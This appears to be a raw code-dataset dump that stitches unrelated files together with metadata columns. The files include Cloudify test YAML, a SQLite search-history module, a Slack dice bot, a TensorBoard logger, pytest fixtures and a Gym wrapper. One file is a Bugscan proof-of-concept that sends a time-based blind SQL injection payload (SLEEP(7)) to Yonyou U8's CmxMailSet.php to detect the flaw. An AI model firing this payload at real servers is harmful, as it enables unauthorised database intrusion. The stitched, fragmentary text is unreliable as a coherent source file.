self.assertEquals(1, len(deployment_plugins)) | en | 0.513214 | # # Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # # NOQA node_templates: test_node1: type: cloudify.nodes.Compute interfaces: test_interface: start: implementation: test_plugin.start inputs: {} relationships: - type: cloudify.relationships.my_relationship target: test_node2 test_node2: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: {} plugins: test_plugin: executor: host_agent source: dummy relationships: cloudify.relationships.my_relationship: source_interfaces: cloudify.interfaces.relationship_lifecycle: postconfigure: implementation: test_plugin.task.postconfigure inputs: {} node_templates: test_node1: type: cloudify.nodes.Compute relationships: - type: cloudify.relationships.my_relationship target: test_node2 test_node2: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: {} plugins: test_plugin: executor: host_agent source: dummy relationships: cloudify.relationships.my_relationship: source_interfaces: cloudify.interfaces.relationship_lifecycle: postconfigure: implementation: test_plugin.task.postconfigure inputs: {} # TODO issue #1 in test_plugins_to_install node_templates: test_node1: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_plugin.start inputs: {} plugins: test_plugin: executor: host_agent source: dummy node_templates: test_node1: type: cloudify.nodes.Compute test_node2: type: test_type relationships: - type: cloudify.relationships.contained_in target: test_node1 test_node3: type: test_type2 relationships: - type: cloudify.relationships.contained_in target: test_node2 test_node4: type: test_type relationships: - type: cloudify.relationships.contained_in target: test_node3 node_types: cloudify.nodes.Compute: {} test_type: interfaces: test_interface: start: implementation: test_plugin.start inputs: {} test_type2: interfaces: test_interface2: install: implementation: test_plugin2.install inputs: {} relationships: cloudify.relationships.contained_in: {} plugins: test_plugin: executor: host_agent source: dummy test_plugin2: executor: host_agent source: dummy # TODO issue #2 in test_plugins_to_install # ensuring non-host nodes don't have this field test_node2: type: test_type relationships: - type: test_relationship target: test_node source_interfaces: test_interface1: install: test_plugin1.install - type: test_relationship target: test_node target_interfaces: test_interface1: install: test_plugin2.install relationships: test_relationship: {} plugins: test_plugin1: executor: central_deployment_agent source: dummy test_plugin2: executor: central_deployment_agent source: dummy # expecting the other plugin to be under test_node rather than # test_node2: node_templates: test_node1: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_plugin.start inputs: {} create: implementation: test_management_plugin.create inputs: {} plugins: test_plugin: executor: host_agent source: dummy test_management_plugin: executor: central_deployment_agent source: dummy # check the property on the plan is correct node_types: test_type: {} node_templates: test_node1: type: test_type interfaces: test_interface: start: implementation: test_plugin.start executor: central_deployment_agent plugins: test_plugin: executor: host_agent source: dummy # TODO issue #3 in test_plugins_to_install # check the property on the plan is correct node_templates: test_node1: type: cloudify.nodes.Root node_types: cloudify.nodes.Root: interfaces: test_interface: start: implementation: cloud.server.start inputs: {} plugins: cloud: executor: central_deployment_agent source: dummy node_templates: test_node1: type: cloudify.nodes.Compute test_node2: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_management_plugin.start inputs: {} plugins: test_management_plugin: executor: central_deployment_agent source: dummy node_templates: test_node1: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_management_plugin1.start inputs: {} create: implementation: test_management_plugin2.create inputs: {} plugins: test_management_plugin1: executor: central_deployment_agent source: dummy test_management_plugin2: executor: central_deployment_agent source: dummy # TODO issue #4 in test_plugins_to_install # check the property on the plan is correct node_templates: test_node1: type: cloudify.nodes.Compute node_types: cloudify.nodes.Compute: interfaces: test_interface: start: implementation: test_management_plugin.start inputs: {} create: implementation: test_management_plugin.create inputs: {} plugins: test_management_plugin: executor: central_deployment_agent source: dummy # check the property on the plan is correct | 1.913796 | 2 |
lib/storage.py | i96751414/plugin.video.flix | 7 | 6613957 | <filename>lib/storage.py
import os
import sqlite3
from lib.api.flix.kodi import ADDON_DATA
class Storage(object):
def __init__(self, database):
self.conn = sqlite3.connect(database)
self.cursor = self.conn.cursor()
def execute_and_commit(self, *args, **kwargs):
self.execute(*args, **kwargs)
self.commit()
def execute(self, *args, **kwargs):
return self.cursor.execute(*args, **kwargs)
def commit(self):
self.conn.commit()
def select_page(self, query, size, page_number, *args, **kwargs):
return self.cursor.execute(query + " LIMIT {:d} OFFSET {:d}".format(size, size * (page_number - 1)),
*args, **kwargs)
def pages_count(self, table_name, page_size, **kwargs):
return (self.count(table_name, **kwargs) + page_size - 1) // page_size
def delete(self, table_name, **kwargs):
where, values = self._where(kwargs)
self.execute_and_commit("DELETE FROM `{}`{}".format(table_name, where), values)
def count(self, table_name, **kwargs):
where, values = self._where(kwargs)
return self.cursor.execute("SELECT COUNT(*) FROM `{}`{}".format(table_name, where), values).fetchone()[0]
def fetch_batches(self, size, *args, **kwargs):
result = self.execute(*args, **kwargs)
while True:
rows = result.fetchmany(size)
if not rows:
break
yield rows
def fetch_items(self, *args, **kwargs):
batch_size = kwargs.pop("batch_size", 20)
for rows in self.fetch_batches(batch_size, *args, **kwargs):
for row in rows:
yield row
def close(self):
self.cursor.close()
self.conn.close()
@staticmethod
def _where(kwargs):
keys = tuple(kwargs)
if keys:
where = " WHERE " + " AND ".join(["{} = ?".format(k) for k in keys])
values = tuple(kwargs[k] for k in keys)
else:
where = ""
values = ()
return where, values
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class SearchHistory(object):
def __init__(self):
self._storage = Storage(os.path.join(ADDON_DATA, "search_history.sqlite"))
self._table_name = "search_history"
self._storage.execute_and_commit(
"CREATE TABLE IF NOT EXISTS `{}` ("
"id INTEGER PRIMARY KEY, "
"last_modified TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, "
"type INTEGER NOT NULL, "
"search TEXT CHECK(search <> '') NOT NULL, "
"UNIQUE(type, search)"
")".format(self._table_name))
self._page_size = 20
def get_page(self, search_type, page_number):
return self._storage.select_page(
"SELECT id, search FROM `{}` WHERE type = ? ORDER BY last_modified DESC".format(self._table_name),
self._page_size, page_number, (search_type,)).fetchall()
def add_entry(self, search_type, search):
# ON CONFLICT(search) DO UPDATE SET last_modified = CURRENT_TIMESTAMP
self._storage.execute_and_commit(
"INSERT INTO `{}` (type, search) VALUES(?, ?);".format(self._table_name), (search_type, search))
def update_entry(self, search_type, old_search, new_search):
self._storage.execute_and_commit(
"UPDATE `{}` SET search = ?, last_modified = CURRENT_TIMESTAMP "
"WHERE type = ? AND search = ?;".format(self._table_name), (new_search, search_type, old_search))
def delete_entry_by_id(self, search_id):
self._storage.delete(self._table_name, id=search_id)
def delete_entry(self, search_type, search):
self._storage.delete(self._table_name, type=search_type, search=search)
def pages_count(self, search_type):
return self._storage.pages_count(self._table_name, self._page_size, type=search_type)
def clear_entries(self):
self._storage.delete(self._table_name)
def close(self):
self._storage.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
| <filename>lib/storage.py
import os
import sqlite3
from lib.api.flix.kodi import ADDON_DATA
class Storage(object):
def __init__(self, database):
self.conn = sqlite3.connect(database)
self.cursor = self.conn.cursor()
def execute_and_commit(self, *args, **kwargs):
self.execute(*args, **kwargs)
self.commit()
def execute(self, *args, **kwargs):
return self.cursor.execute(*args, **kwargs)
def commit(self):
self.conn.commit()
def select_page(self, query, size, page_number, *args, **kwargs):
return self.cursor.execute(query + " LIMIT {:d} OFFSET {:d}".format(size, size * (page_number - 1)),
*args, **kwargs)
def pages_count(self, table_name, page_size, **kwargs):
return (self.count(table_name, **kwargs) + page_size - 1) // page_size
def delete(self, table_name, **kwargs):
where, values = self._where(kwargs)
self.execute_and_commit("DELETE FROM `{}`{}".format(table_name, where), values)
def count(self, table_name, **kwargs):
where, values = self._where(kwargs)
return self.cursor.execute("SELECT COUNT(*) FROM `{}`{}".format(table_name, where), values).fetchone()[0]
def fetch_batches(self, size, *args, **kwargs):
result = self.execute(*args, **kwargs)
while True:
rows = result.fetchmany(size)
if not rows:
break
yield rows
def fetch_items(self, *args, **kwargs):
batch_size = kwargs.pop("batch_size", 20)
for rows in self.fetch_batches(batch_size, *args, **kwargs):
for row in rows:
yield row
def close(self):
self.cursor.close()
self.conn.close()
@staticmethod
def _where(kwargs):
keys = tuple(kwargs)
if keys:
where = " WHERE " + " AND ".join(["{} = ?".format(k) for k in keys])
values = tuple(kwargs[k] for k in keys)
else:
where = ""
values = ()
return where, values
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class SearchHistory(object):
def __init__(self):
self._storage = Storage(os.path.join(ADDON_DATA, "search_history.sqlite"))
self._table_name = "search_history"
self._storage.execute_and_commit(
"CREATE TABLE IF NOT EXISTS `{}` ("
"id INTEGER PRIMARY KEY, "
"last_modified TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, "
"type INTEGER NOT NULL, "
"search TEXT CHECK(search <> '') NOT NULL, "
"UNIQUE(type, search)"
")".format(self._table_name))
self._page_size = 20
def get_page(self, search_type, page_number):
return self._storage.select_page(
"SELECT id, search FROM `{}` WHERE type = ? ORDER BY last_modified DESC".format(self._table_name),
self._page_size, page_number, (search_type,)).fetchall()
def add_entry(self, search_type, search):
# ON CONFLICT(search) DO UPDATE SET last_modified = CURRENT_TIMESTAMP
self._storage.execute_and_commit(
"INSERT INTO `{}` (type, search) VALUES(?, ?);".format(self._table_name), (search_type, search))
def update_entry(self, search_type, old_search, new_search):
self._storage.execute_and_commit(
"UPDATE `{}` SET search = ?, last_modified = CURRENT_TIMESTAMP "
"WHERE type = ? AND search = ?;".format(self._table_name), (new_search, search_type, old_search))
def delete_entry_by_id(self, search_id):
self._storage.delete(self._table_name, id=search_id)
def delete_entry(self, search_type, search):
self._storage.delete(self._table_name, type=search_type, search=search)
def pages_count(self, search_type):
return self._storage.pages_count(self._table_name, self._page_size, type=search_type)
def clear_entries(self):
self._storage.delete(self._table_name)
def close(self):
self._storage.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
| en | 0.573725 | # ON CONFLICT(search) DO UPDATE SET last_modified = CURRENT_TIMESTAMP | 2.791206 | 3 |
src/dungeonbot/plugins/roll.py | tlake/dungeonbot_backup | 0 | 6613958 | <reponame>tlake/dungeonbot_backup
"""Define logic for the Roll plugin."""
from dungeonbot.plugins.primordials import BangCommandPlugin
from dungeonbot.handlers.slack import SlackHandler
from dungeonbot.plugins.helpers.die_roll import DieRoll
from dungeonbot.models.roll import RollModel
class RollPlugin(BangCommandPlugin):
"""Plugin for roll."""
help_text = """```
command:
!roll
description:
Rolls dice for you.
This command is whitespace-agnostic.
("1d2+2" will be processed exactly the same as "1 d 2 +2")
You can specify multiple die rolls in the same command as long as they
are separated by commas.
You can specify a roll to be made with advantage by prepending the roll
with the `-a` flag (or just `a`), or with disadvantage by prepending the
roll with `-d` (or just `d`).
You can also save a roll with a name, and then use that name later.
<PARAMS> are required
[PARAMS] are optional
usage:
!roll [ADVANTAGE/DISADVANTAGE] <HOW MANY> d <SIDES> [+/-MODIFIER] [, ... ]
!roll [SAVE/LIST/DELETE] <NAMED ROLL>
!roll [ADVANTAGE/DISADVANTAGE] <NAMED ROLL>
examples:
!roll 2d6
!roll -d 1d20-2
!roll a 1d20+4, 4d6, -d 1d20+3
!roll save fireballdmg 8d6
!roll fireballdmg
!roll list
!roll delete fireballdmg
```"""
def run(self):
"""Run Roll Plugin."""
bot = SlackHandler()
user = bot.get_user_obj_from_id(self.event['user'])
args = self.arg_string.split(",")
message = "_*Roll result{} for {}:*_".format(
"s" if len(args) > 1 else "",
user["name"],
)
for item in args:
message += "\n" + self.process_roll(item, user)
bot.make_post(self.event, message)
def process_roll(self, user_input, user):
"""Parse user input and delegate to appropriate roll func."""
args = user_input.split()
commands = {
"save": self.save_roll,
"list": self.list_rolls,
"delete": self.delete_roll,
}
if args[0] in commands:
return commands[args[0]](args[1:], user)
# test = user_input.replace(" ", "").split("d")
# if not test[0].isdigit() or not test[1].isdigit():
# return "Not a valid command."
# else:
# return self.make_roll(args, user)
# Shitty removal of validation, instead of a proper refactor
# The issue is that the above block considers a roll with
# advantage or disadvantage to be invalid
# - example: "-a 1d20" is invalid here
return self.make_roll(args, user)
def is_valid_roll_string(self, roll_str):
"""Check if roll string is valid, with or without a flag."""
if not roll_str[0].isdigit():
roll_str = roll_str[1:]
return roll_str[0].isdigit() and roll_str[1] == "d" and roll_str[2].isdigit()
def save_roll(self, args, user):
"""Save new roll as key/val pair for requesting user."""
key = args[0]
val = "".join(args[1:])
if not (key and val):
return "Not a valid Key/Pair."
if not self.is_valid_roll_string(val):
return "Not a properly formatted roll string."
instance = RollModel.new(key=key, val=val, user=user)
return "Successfully Saved " + instance.slack_msg
def delete_roll(self, args, user):
"""Delete existing roll via key."""
key = "".join(args)
instance = RollModel.get(key=key, user=user)
if instance:
return "{} was successfully deleted.".format(RollModel.delete(instance))
else:
return "Cannot find item {}".format(key)
def list_rolls(self, args, user):
"""List requesting user's saved rolls.
If additional argument is passed in, use as limit,
otherwise limit to 10 results returned.
"""
message = "*Saved Rolls for {}:*".format(user["name"])
how_many = int("".join(args)) if args else 10
saved = RollModel.list(how_many=how_many, user=user)
for x in saved:
message += "\n" + x.slack_msg
return message
def parse_flag_and_roll_string(self, args):
"""Separate roll string and flag from args. Accepts a list and returns a string."""
roll_flags = ["a", "d"]
flag = None
arg = args[0].lstrip("-")
if arg[0] in roll_flags:
flag = arg[0]
roll_str = "".join(args[1:])
else:
roll_str = "".join(args)
return roll_str, flag
def make_roll(self, args, user):
"""Roll given roll string and return result.
If given roll string is existing saved string, look
up entry and roll the associated value.
"""
name, temp_flag = None, None
roll_str, flag = self.parse_flag_and_roll_string(args)
saved_roll = RollModel.get(key=roll_str, user=user)
if saved_roll:
name = saved_roll.key
roll_str, temp_flag = self.parse_flag_and_roll_string([saved_roll.val])
r = DieRoll(roll_str, temp_flag or flag)
return r.print_results(r.action(), name)
| """Define logic for the Roll plugin."""
from dungeonbot.plugins.primordials import BangCommandPlugin
from dungeonbot.handlers.slack import SlackHandler
from dungeonbot.plugins.helpers.die_roll import DieRoll
from dungeonbot.models.roll import RollModel
class RollPlugin(BangCommandPlugin):
"""Plugin for roll."""
help_text = """```
command:
!roll
description:
Rolls dice for you.
This command is whitespace-agnostic.
("1d2+2" will be processed exactly the same as "1 d 2 +2")
You can specify multiple die rolls in the same command as long as they
are separated by commas.
You can specify a roll to be made with advantage by prepending the roll
with the `-a` flag (or just `a`), or with disadvantage by prepending the
roll with `-d` (or just `d`).
You can also save a roll with a name, and then use that name later.
<PARAMS> are required
[PARAMS] are optional
usage:
!roll [ADVANTAGE/DISADVANTAGE] <HOW MANY> d <SIDES> [+/-MODIFIER] [, ... ]
!roll [SAVE/LIST/DELETE] <NAMED ROLL>
!roll [ADVANTAGE/DISADVANTAGE] <NAMED ROLL>
examples:
!roll 2d6
!roll -d 1d20-2
!roll a 1d20+4, 4d6, -d 1d20+3
!roll save fireballdmg 8d6
!roll fireballdmg
!roll list
!roll delete fireballdmg
```"""
def run(self):
"""Run Roll Plugin."""
bot = SlackHandler()
user = bot.get_user_obj_from_id(self.event['user'])
args = self.arg_string.split(",")
message = "_*Roll result{} for {}:*_".format(
"s" if len(args) > 1 else "",
user["name"],
)
for item in args:
message += "\n" + self.process_roll(item, user)
bot.make_post(self.event, message)
def process_roll(self, user_input, user):
"""Parse user input and delegate to appropriate roll func."""
args = user_input.split()
commands = {
"save": self.save_roll,
"list": self.list_rolls,
"delete": self.delete_roll,
}
if args[0] in commands:
return commands[args[0]](args[1:], user)
# test = user_input.replace(" ", "").split("d")
# if not test[0].isdigit() or not test[1].isdigit():
# return "Not a valid command."
# else:
# return self.make_roll(args, user)
# Shitty removal of validation, instead of a proper refactor
# The issue is that the above block considers a roll with
# advantage or disadvantage to be invalid
# - example: "-a 1d20" is invalid here
return self.make_roll(args, user)
def is_valid_roll_string(self, roll_str):
"""Check if roll string is valid, with or without a flag."""
if not roll_str[0].isdigit():
roll_str = roll_str[1:]
return roll_str[0].isdigit() and roll_str[1] == "d" and roll_str[2].isdigit()
def save_roll(self, args, user):
"""Save new roll as key/val pair for requesting user."""
key = args[0]
val = "".join(args[1:])
if not (key and val):
return "Not a valid Key/Pair."
if not self.is_valid_roll_string(val):
return "Not a properly formatted roll string."
instance = RollModel.new(key=key, val=val, user=user)
return "Successfully Saved " + instance.slack_msg
def delete_roll(self, args, user):
"""Delete existing roll via key."""
key = "".join(args)
instance = RollModel.get(key=key, user=user)
if instance:
return "{} was successfully deleted.".format(RollModel.delete(instance))
else:
return "Cannot find item {}".format(key)
def list_rolls(self, args, user):
"""List requesting user's saved rolls.
If additional argument is passed in, use as limit,
otherwise limit to 10 results returned.
"""
message = "*Saved Rolls for {}:*".format(user["name"])
how_many = int("".join(args)) if args else 10
saved = RollModel.list(how_many=how_many, user=user)
for x in saved:
message += "\n" + x.slack_msg
return message
def parse_flag_and_roll_string(self, args):
"""Separate roll string and flag from args. Accepts a list and returns a string."""
roll_flags = ["a", "d"]
flag = None
arg = args[0].lstrip("-")
if arg[0] in roll_flags:
flag = arg[0]
roll_str = "".join(args[1:])
else:
roll_str = "".join(args)
return roll_str, flag
def make_roll(self, args, user):
"""Roll given roll string and return result.
If given roll string is existing saved string, look
up entry and roll the associated value.
"""
name, temp_flag = None, None
roll_str, flag = self.parse_flag_and_roll_string(args)
saved_roll = RollModel.get(key=roll_str, user=user)
if saved_roll:
name = saved_roll.key
roll_str, temp_flag = self.parse_flag_and_roll_string([saved_roll.val])
r = DieRoll(roll_str, temp_flag or flag)
return r.print_results(r.action(), name) | en | 0.700605 | Define logic for the Roll plugin. Plugin for roll. ``` command: !roll description: Rolls dice for you. This command is whitespace-agnostic. ("1d2+2" will be processed exactly the same as "1 d 2 +2") You can specify multiple die rolls in the same command as long as they are separated by commas. You can specify a roll to be made with advantage by prepending the roll with the `-a` flag (or just `a`), or with disadvantage by prepending the roll with `-d` (or just `d`). You can also save a roll with a name, and then use that name later. <PARAMS> are required [PARAMS] are optional usage: !roll [ADVANTAGE/DISADVANTAGE] <HOW MANY> d <SIDES> [+/-MODIFIER] [, ... ] !roll [SAVE/LIST/DELETE] <NAMED ROLL> !roll [ADVANTAGE/DISADVANTAGE] <NAMED ROLL> examples: !roll 2d6 !roll -d 1d20-2 !roll a 1d20+4, 4d6, -d 1d20+3 !roll save fireballdmg 8d6 !roll fireballdmg !roll list !roll delete fireballdmg ``` Run Roll Plugin. Parse user input and delegate to appropriate roll func. # test = user_input.replace(" ", "").split("d") # if not test[0].isdigit() or not test[1].isdigit(): # return "Not a valid command." # else: # return self.make_roll(args, user) # Shitty removal of validation, instead of a proper refactor # The issue is that the above block considers a roll with # advantage or disadvantage to be invalid # - example: "-a 1d20" is invalid here Check if roll string is valid, with or without a flag. Save new roll as key/val pair for requesting user. Delete existing roll via key. List requesting user's saved rolls. If additional argument is passed in, use as limit, otherwise limit to 10 results returned. Separate roll string and flag from args. Accepts a list and returns a string. Roll given roll string and return result. If given roll string is existing saved string, look up entry and roll the associated value. | 2.842339 | 3 |
torch_tools/training/util/logger.py | gregunz/TorchTools | 0 | 6613959 | <reponame>gregunz/TorchTools
from abc import abstractmethod, ABCMeta
from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import make_grid
from torch_tools.metrics import compute_roc_auc, create_roc_figure
class Logger:
@property
@abstractmethod
def logger(self) -> SummaryWriter:
raise NotImplementedError
def log_auc_roc(self, tag, outputs, targets, global_step):
fpr, tpr, _, auc = compute_roc_auc(outputs, targets)
roc_figure = create_roc_figure(fpr, tpr)
self.logger.add_figure(
tag=f'{tag}/roc',
figure=roc_figure,
global_step=global_step,
)
self.logger.add_scalar(
tag=f'{tag}/auc',
scalar_value=auc,
global_step=global_step,
)
return auc
class ImageLogger(Logger, metaclass=ABCMeta):
def __init__(self, output_to_image):
self.output_to_img = output_to_image
def log_images(self, tag, images_tensor, global_step):
if images_tensor.dim() == 3:
images_tensor = images_tensor.unsqueeze(0)
num_cols = images_tensor.size(0)
num_rows = images_tensor.size(1)
images = []
for i in range(num_cols):
images += [self.output_to_img(images_tensor[i, img_idx]) for img_idx in range(num_rows)]
self.logger.add_image(
tag=tag,
img_tensor=make_grid(images, nrow=num_rows),
global_step=global_step,
)
| from abc import abstractmethod, ABCMeta
from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import make_grid
from torch_tools.metrics import compute_roc_auc, create_roc_figure
class Logger:
@property
@abstractmethod
def logger(self) -> SummaryWriter:
raise NotImplementedError
def log_auc_roc(self, tag, outputs, targets, global_step):
fpr, tpr, _, auc = compute_roc_auc(outputs, targets)
roc_figure = create_roc_figure(fpr, tpr)
self.logger.add_figure(
tag=f'{tag}/roc',
figure=roc_figure,
global_step=global_step,
)
self.logger.add_scalar(
tag=f'{tag}/auc',
scalar_value=auc,
global_step=global_step,
)
return auc
class ImageLogger(Logger, metaclass=ABCMeta):
def __init__(self, output_to_image):
self.output_to_img = output_to_image
def log_images(self, tag, images_tensor, global_step):
if images_tensor.dim() == 3:
images_tensor = images_tensor.unsqueeze(0)
num_cols = images_tensor.size(0)
num_rows = images_tensor.size(1)
images = []
for i in range(num_cols):
images += [self.output_to_img(images_tensor[i, img_idx]) for img_idx in range(num_rows)]
self.logger.add_image(
tag=tag,
img_tensor=make_grid(images, nrow=num_rows),
global_step=global_step,
) | none | 1 | 2.275107 | 2 | |
tests/conftest.py | sprat/sfrbox-client | 0 | 6613960 | <gh_stars>0
"""
Fixtures for tests
"""
# pylint: disable=redefined-outer-name
import pytest
import pkg_resources
from neufbox import Client
@pytest.fixture
def client():
"""Return a client instance"""
return Client('192.168.1.1')
def read_xml(filename):
"""Read a XML test file"""
filepath = pkg_resources.resource_filename(__name__, filename)
with open(filepath, 'r') as xml_file:
return xml_file.read()
@pytest.fixture
def mock_get_request(client, requests_mock):
"""Mock a GET request to the API"""
def func(url_query, xml_filename):
return requests_mock.get(f'{client.api_url}{url_query}', text=read_xml(xml_filename))
return func
@pytest.fixture
def mock_post_request(client, requests_mock):
"""Mock a POST request to the API"""
def func(url_query):
return requests_mock.post(f'{client.api_url}{url_query}', text=read_xml('empty.xml'))
return func
| """
Fixtures for tests
"""
# pylint: disable=redefined-outer-name
import pytest
import pkg_resources
from neufbox import Client
@pytest.fixture
def client():
"""Return a client instance"""
return Client('192.168.1.1')
def read_xml(filename):
"""Read a XML test file"""
filepath = pkg_resources.resource_filename(__name__, filename)
with open(filepath, 'r') as xml_file:
return xml_file.read()
@pytest.fixture
def mock_get_request(client, requests_mock):
"""Mock a GET request to the API"""
def func(url_query, xml_filename):
return requests_mock.get(f'{client.api_url}{url_query}', text=read_xml(xml_filename))
return func
@pytest.fixture
def mock_post_request(client, requests_mock):
"""Mock a POST request to the API"""
def func(url_query):
return requests_mock.post(f'{client.api_url}{url_query}', text=read_xml('empty.xml'))
return func | en | 0.651 | Fixtures for tests # pylint: disable=redefined-outer-name Return a client instance Read a XML test file Mock a GET request to the API Mock a POST request to the API | 2.546603 | 3 |
Bugscan_exploits-master/exp_list/exp-1969.py | csadsl/poc_exp | 11 | 6613961 | <reponame>csadsl/poc_exp<gh_stars>10-100
#/usr/bin/python
#-*- coding: utf-8 -*-
"""
POC Name : 用友u8 CmxMailSet.php sql注入
Author : a
mail : <EMAIL>
Refer : http://www.wooyun.org/bugs/wooyun-2015-156891
"""
import re
import time
def assign(service, arg):
if service == "yongyou_u8":
return True, arg
def audit(arg):
url = arg + "Server/CmxMailSet.php"
data_poc = "sendmail=test' AND (SELECT * FROM (SELECT(SLEEP(7)))MDqI) AND 'geIm'='geIm&username=test"
data = "sendmail=test&username=test"
time1 = time.time()
code1, head, res, errcode, _ = curl.curl2(url, data)
time2 = time.time()
true_time=time2-time1
time3 = time.time()
code2, head, res, errcode, _ = curl.curl2(url, data_poc)
time4 = time.time()
false_time =time4-time3
if code1==302 and code2==302 and false_time-true_time > 6:
security_hole(url + ' sql injection!')
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_u8', 'http://172.16.31.10:81/')[1]) | #/usr/bin/python
#-*- coding: utf-8 -*-
"""
POC Name : 用友u8 CmxMailSet.php sql注入
Author : a
mail : <EMAIL>
Refer : http://www.wooyun.org/bugs/wooyun-2015-156891
"""
import re
import time
def assign(service, arg):
if service == "yongyou_u8":
return True, arg
def audit(arg):
url = arg + "Server/CmxMailSet.php"
data_poc = "sendmail=test' AND (SELECT * FROM (SELECT(SLEEP(7)))MDqI) AND 'geIm'='geIm&username=test"
data = "sendmail=test&username=test"
time1 = time.time()
code1, head, res, errcode, _ = curl.curl2(url, data)
time2 = time.time()
true_time=time2-time1
time3 = time.time()
code2, head, res, errcode, _ = curl.curl2(url, data_poc)
time4 = time.time()
false_time =time4-time3
if code1==302 and code2==302 and false_time-true_time > 6:
security_hole(url + ' sql injection!')
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_u8', 'http://172.16.31.10:81/')[1]) | fr | 0.220242 | #/usr/bin/python #-*- coding: utf-8 -*- POC Name : 用友u8 CmxMailSet.php sql注入
Author : a
mail : <EMAIL>
Refer : http://www.wooyun.org/bugs/wooyun-2015-156891 | 2.256662 | 2 |
baconian/envs/gym_env.py | GilraGroup/baconian-project | 69 | 6613962 | <filename>baconian/envs/gym_env.py
from baconian.core.core import Env, EnvSpec
import gym.envs
from gym.envs.registration import registry
# do not remove the following import statements
import pybullet
import pybullet_envs
have_mujoco_flag = True
try:
from gym.envs.mujoco import mujoco_env
except Exception:
have_mujoco_flag = False
import numpy as np
import types
import gym.spaces as GymSpace
import baconian.common.spaces as garage_space
import gym.error as gym_error
_env_inited_count = dict()
def make(gym_env_id: str, allow_multiple_env=True):
"""
:param gym_env_id: gym environment id
:type gym_env_id: int
:param allow_multiple_env: allow multiple environments, by default True
:type allow_multiple_env: bool
:return: new gym environment
:rtype: GymEnv
"""
if allow_multiple_env is True:
if gym_env_id not in _env_inited_count:
_env_inited_count[gym_env_id] = 0
else:
_env_inited_count[gym_env_id] += 1
return GymEnv(gym_env_id, name='{}_{}'.format(gym_env_id, _env_inited_count[gym_env_id]))
else:
return GymEnv(gym_env_id)
def space_converter(space: GymSpace.Space):
"""
Convert space into any one of "Box", "Discrete", or "Tuple" type.
:param space: space of gym environment
:type space: GymSpace
:return: converted space
:rtype: Box, Discrete, or Tuple
"""
if isinstance(space, GymSpace.Box):
return garage_space.Box(low=space.low, high=space.high)
elif isinstance(space, GymSpace.Dict):
return garage_space.Dict(space.spaces)
elif isinstance(space, GymSpace.Discrete):
return garage_space.Discrete(space.n)
elif isinstance(space, GymSpace.Tuple):
return garage_space.Tuple(list(map(space_converter, space.spaces)))
else:
raise NotImplementedError
class GymEnv(Env):
"""
Gym environment wrapping module
"""
_all_gym_env_id = list(registry.env_specs.keys())
def __init__(self, gym_env_id: str, name: str = None):
"""
:param gym_env_id: gym environment id
:type gym_env_id: str
:param name: name of the gym environment instance
:type name: str
"""
super().__init__(name=name if name else gym_env_id)
self.env_id = gym_env_id
try:
self._gym_env = gym.make(gym_env_id)
except gym_error.UnregisteredEnv:
raise ValueError('Env id: {} is not supported currently'.format(gym_env_id))
self._gym_env = gym.make(gym_env_id)
self.action_space = space_converter(self._gym_env.action_space)
self.observation_space = space_converter(self._gym_env.observation_space)
if isinstance(self.action_space, garage_space.Box):
self.action_space.low = np.nan_to_num(self.action_space.low)
self.action_space.high = np.nan_to_num(self.action_space.high)
self.action_space.sample = types.MethodType(self._sample_with_nan, self.action_space)
if isinstance(self.observation_space, garage_space.Box):
self.observation_space.low = np.nan_to_num(self.observation_space.low)
self.observation_space.high = np.nan_to_num(self.observation_space.high)
self.observation_space.sample = types.MethodType(self._sample_with_nan, self.observation_space)
self.env_spec = EnvSpec(obs_space=self.observation_space,
action_space=self.action_space)
self.reward_range = self._gym_env.reward_range
def step(self, action):
"""
:param action: action to be taken by agent in the environment
:type action: action to be taken by agent in the environment
:return: step of the unwrapped environment
:rtype: gym env
"""
super().step(action)
action = self.env_spec.flat_action(action)
state, re, done, info = self.unwrapped.step(action=action)
return state, re, bool(done), info
def reset(self):
"""
Reset the gym environment.
:return:
"""
super().reset()
return self.unwrapped.reset()
def init(self):
"""
Initialize the gym environment.
:return:
"""
super().init()
return self.reset()
def seed(self, seed=None):
"""
:param seed: seed of random number generalization
:type seed: int
:return: seed of the unwrapped environment
:rtype: int
"""
return super().seed(seed)
def get_state(self):
"""
:return:the state of unwrapped gym environment
:rtype: np.ndarray
"""
if (have_mujoco_flag is True and isinstance(self.unwrapped_gym, mujoco_env.MujocoEnv)) or (
hasattr(self.unwrapped_gym, '_get_obs') and callable(self.unwrapped_gym._get_obs)):
return self.unwrapped_gym._get_obs()
elif hasattr(self.unwrapped_gym, '_get_ob') and callable(self.unwrapped_gym._get_ob):
return self.unwrapped_gym._get_ob()
elif hasattr(self.unwrapped_gym, 'state'):
return self.unwrapped_gym.state if isinstance(self.unwrapped_gym.state, np.ndarray) else np.array(
self.unwrapped_gym.state)
elif hasattr(self.unwrapped_gym, 'observation'):
return self.unwrapped_gym.observation if isinstance(self.unwrapped_gym.observation,
np.ndarray) else np.array(
self.unwrapped_gym.state)
elif hasattr(self.unwrapped_gym, 'spec') and hasattr(self.unwrapped_gym.spec,
'id') and self.unwrapped_gym.spec.id in specialEnv:
return specialEnv[self.unwrapped_gym.spec.id](self)
